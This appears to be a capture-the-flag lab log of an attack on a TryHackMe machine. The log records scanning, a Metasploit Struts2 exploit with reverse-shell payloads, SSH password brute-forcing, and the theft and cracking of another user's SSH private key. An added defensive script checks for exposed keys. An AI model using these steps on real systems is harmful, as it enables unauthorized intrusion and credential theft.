sudo openvpn ~/Desktop/tryhackme.ovpn
=================================
10.201.76.77 -- domain.com -- lin x32/x64
=================================
2025-08-01 17:49:58 -- nmap --disable-arp-ping -PS 10.201.76.77
//host up
2025-08-01 17:54:11 -- nmap -sC -sV -O -T4 10.201.76.77
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fe:f4:18:b2:ec:82:dc:a8:d1:92:f0:78:5d:5f:9e:d8 (RSA)
| 256 09:0b:2a:5f:25:30:4d:23:24:60:2c:af:85:31:fe:52 (ECDSA)
|_ 256 5f:3b:af:9f:1a:6d:7c:24:08:73:08:59:99:0a:bb:a5 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.41 (Ubuntu)
139/tcp open netbios-ssn Samba smbd 4
445/tcp open netbios-ssn Samba smbd 4
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/9.0.7
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 5 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2025-08-01T21:54:29
|_ start_date: N/A
|_clock-skew: -1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
2025-08-01 17:56:27 -- gobuster dir --wordlist /usr/share/wordlists/dirbuster/apache-user-enum-2.0.txt --url 10.201.76.77
//bad command
2025-08-01 18:03:43 -- wget --quiet --output-document=- 10.201.76.77
2025-08-01 18:04:43 -- gobuster dir --threads 20 --wordlist /usr/share/wordlists/dirb/common.txt --url http://10.201.76.77/
/.htaccess (Status: 403) [Size: 277]
/.hta (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/development (Status: 301) [Size: 318] [--> http://10.201.76.77/development/]
/index.html (Status: 200) [Size: 158]
/server-status (Status: 403) [Size: 277]
2025-08-01 18:06:34 -- wget --quiet --output-document=- http://10.201.76.77/development/
===
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
===
For J:
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K
===
// very nice
// Struts 2 REST (CVE-2017-9805)
use exploit/multi/http/struts2_rest_xstream
show options
set RHOST 10.201.76.77
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST // already good
set LPORT 31253
2025-08-01 18:14:48 -- run
[-] Exploit failed: linux/x86/meterpreter/reverse_tcp is not a compatible payload.
[*] Exploit completed, but no session was created.
// failed
set PAYLOAD cmd/unix/reverse
2025-08-01 18:15:27 -- run
[*] Started reverse TCP double handler on 192.168.121.36:31253
[*] Exploit completed, but no session was created.
// no dice
sudo apt install seclists
2025-08-01 18:19:25 -- curl -X POST -H "Content-Type: application/xml" -d '<test/>' http://10.201.76.77/orders/3
<title>404 Not Found</title>
2025-08-01 18:25:17 -- gobuster dir --wordlist /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt --extensions html,php,txt,json,xml --url http://10.201.76.77
// nada
2025-08-01 18:26:13 -- rerun without extensions
// moving on
2025-08-01 18:29:52 -- nbtscan 10.201.76.77
// nada
2025-08-01 18:30:02 -- nmap -p 137,139,445 --script nbstat,smb-os-discovery,smb-enum-shares,smb-enum-users 10.201.76.77
| nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| BASIC2<00> Flags: <unique><active>
| BASIC2<03> Flags: <unique><active>
| BASIC2<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
2025-08-01 18:31:17 -- enum4linux 10.201.76.77
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
S-1-22-1-1002 Unix User\ubuntu (Local User)
// here are the users and we know jan has a weak password
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
2025-08-01 19:07:06 -- crackmapexec smb -u jan -p /usr/share/wordlists/rockyou.txt --no-bruteforce 10.201.76.77
SMB 10.201.76.77 445 BASIC2 [*] Windows 6.1 Build 0 (name:BASIC2) (domain:ec2.internal) (signing:False) (SMBv1:False)
SMB 10.201.76.77 445 BASIC2 [+] ec2.internal\jan:123456
2025-08-01 19:08:39 -- crackmapexec smb -u kay -p /usr/share/wordlists/rockyou.txt --no-bruteforce 10.201.76.77
SMB 10.201.76.77 445 BASIC2 [+] ec2.internal\kay:123456
2025-08-01 19:09:41 -- smbclient -L //10.201.76.77/ -U jan
Password for [WORKGROUP\jan]:
Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.15.13-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 10.201.76.77 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
2025-08-01 19:11:15 -- hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.201.76.77
[22][ssh] host: 10.201.76.77 login: jan password: armando
// PASSWORD^^^
2025-08-01 19:16:03 -- hydra -l kay -P /usr/share/wordlists/rockyou.txt ssh://10.201.76.77
2025-08-01 19:13:24 -- smbclient //10.201.76.77/Anonymous -U jan
smb: \> ls
. D 0 Thu Apr 19 13:31:20 2018
.. D 0 Thu Apr 19 13:13:06 2018
staff.txt N 173 Thu Apr 19 13:29:55 2018
14282840 blocks of size 1024. 6440700 blocks available
smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
===
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay
===
2025-08-01 19:25:26 -- sshpass -p "armando" ssh jan@10.201.76.77
// success
//local machine
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -O /tmp/linpeas.sh
2025-08-01 19:32:00 -- scp /tmp/linpeas.sh jan@10.201.76.77:/tmp/
chmod +x /tmp/linpeas.sh
2025-08-01 19:33:35 -- /tmp/linpeas.sh 2>&1 | tee /tmp/linpeas-output.txt
scp jan@10.201.76.77:/tmp/linpeas-output.txt ~/
// cool stuff
/home/kay/.ssh/authorized_keys
/home/kay/.ssh/id_rsa
/home/kay/.ssh/id_rsa.pub
/home/kay/pass.bak
jan@ip-10-201-76-77:~$ ls -la /home/kay/.ssh
total 20
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 ..
-rw-rw-r-- 1 kay kay 771 Apr 23 2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19 2018 id_rsa
-rw-r--r-- 1 kay kay 771 Apr 19 2018 id_rsa.pub
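Added example, not part of the original notes: a defender-side check for the finding above (a private key left at mode 0644 in another user's ~/.ssh). It walks a directory (assumed /home by default) and reports any private key file that is readable by group or others.

```python
import os
import stat
import sys

# PEM headers that identify a private key (OpenSSH, RSA, EC, DSA, PKCS#8).
PRIVATE_KEY_HEADERS = (
    b"-----BEGIN OPENSSH PRIVATE KEY-----",
    b"-----BEGIN RSA PRIVATE KEY-----",
    b"-----BEGIN EC PRIVATE KEY-----",
    b"-----BEGIN DSA PRIVATE KEY-----",
    b"-----BEGIN PRIVATE KEY-----",
)


def is_private_key(path):
    """True if the file begins with one of the known private-key headers."""
    try:
        with open(path, "rb") as fh:
            head = fh.read(64)
    except OSError:  # unreadable to us, so not a leak from this vantage point
        return False
    return head.startswith(PRIVATE_KEY_HEADERS)


def find_exposed_keys(base):
    """Return [(path, mode)] for private keys under base readable by group or others.

    A key at 0o600 is fine; anything with the g+r or o+r bit set is reported,
    which is exactly the 0644 id_rsa case in the listing above.
    """
    exposed = []
    for root, _dirs, files in os.walk(base):
        for name in files:
            path = os.path.join(root, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue  # skip symlinks, sockets and other non-regular files
            if is_private_key(path) and st.st_mode & (stat.S_IRGRP | stat.S_IROTH):
                exposed.append((path, oct(stat.S_IMODE(st.st_mode))))
    return exposed


if __name__ == "__main__":
    # Assumed default: scan /home; pass another directory as the first argument.
    base_dir = sys.argv[1] if len(sys.argv) > 1 else "/home"
    for path, mode in find_exposed_keys(base_dir):
        print(f"{mode} {path}  (expected 0o600)")
```

Run it as root (or as each user) from cron and alert on any output; the same check catches a key copied into a world-readable backup directory.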
2025-08-01 19:46:58 -- sshpass -p "armando" scp jan@10.201.76.77:/home/kay/.ssh/id_rsa /tmp/TARGET_id_rsa
chmod 600 /tmp/TARGET_id_rsa
2025-08-01 19:47:33 -- ssh -i /tmp/TARGET_id_rsa kay@10.201.76.77
// asked for passphrase... let's try to crack it
2025-08-01 19:49:52 -- ssh2john /tmp/TARGET_id_rsa > /tmp/TARGET_KAY_id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/TARGET_KAY_id_rsa.hash
// winner!
beeswax (/tmp/TARGET_id_rsa)
2025-08-01 19:50:40 -- ssh again w/ SSH keyfile password
kay@ip-10-201-76-77:~$ ls -l
total 4
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
kay@ip-10-201-76-77:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$